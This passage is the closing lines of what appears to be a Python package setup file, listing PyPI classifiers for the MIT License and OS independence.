        "License :: OSI Approved :: MIT License",
        "Operating System :: OS Independent",
    ),
)